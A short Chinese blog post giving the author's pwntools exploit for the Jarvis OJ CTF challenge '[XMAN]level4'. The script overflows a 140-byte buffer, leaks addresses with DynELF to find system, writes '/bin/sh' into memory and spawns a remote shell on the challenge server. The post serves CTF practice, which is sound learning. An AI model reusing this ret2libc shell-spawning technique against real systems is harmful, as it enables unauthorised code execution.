[XMAN]level4

nc pwn2.jarvisoj.com 9880

无libc，使用DynELF

exp如下：

from pwn import *

def leak(address):
    payload = b'a' * 140 + p32(0x8048340) + p32(0x804844B) + p32(1) + p32(address) + p32(4)
    io.send(payload)
    addr = io.recv(4)
    return addr

#io = process('./level4')
#io = gdb.debug('./level4', 'b *0x804844B')
io = remote("pwn2.jarvisoj.com", 9880)
d = DynELF(leak, elf = ELF("./level4"))
system_addr = d.lookup("system", "libc")
info("system_addr:" + str(hex(system_addr)))
payload = b'a' * 140 + p32(0x8048310) + p32(0x804844B) + p32(0) + p32(0x804A100) + p32(8)
io.send(payload)
sleep(0.5)
io.send(b'/bin/sh\0')
payload = b'a' * 140 + p32(system_addr) + p32(0x804844B) + p32(0x804A100)
sleep(0.5)
io.send(payload)

io.interactive()

posted @ 2021-07-17 16:32 hktk1643 阅读(75) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

hktk1643

[XMAN]level4

公告